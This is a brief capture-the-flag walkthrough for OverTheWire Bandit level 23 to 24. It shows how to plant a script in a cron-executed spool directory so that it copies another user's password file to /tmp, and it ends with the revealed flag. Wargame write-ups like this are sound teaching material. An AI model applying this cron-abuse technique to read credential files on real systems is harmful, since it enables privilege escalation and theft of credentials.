### Bandit Write Up
### Level 23 --> 24
ssh bandit23@bandit.labs.overthewire.org -p 2220
cd /etc/cron.d/
ls -ls
cat cronjob_bandit24 #Executes and deletes scripts in /var/spool/$myname(which is bandit24)
cd /var/spool/bandit24
nano /tmp/pwd.sh
###!/bin/bash
##cd /etc/bandit_pass
##cat bandit24 > /tmp/pwd
##chmod +r /tmp/pwd
chmod +x /tmp/pwd.sh
cp /tmp/pwd.sh pwd.sh #Wait 1 minute for the crontab to execute
cat /tmp/pwd
# Flag is UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ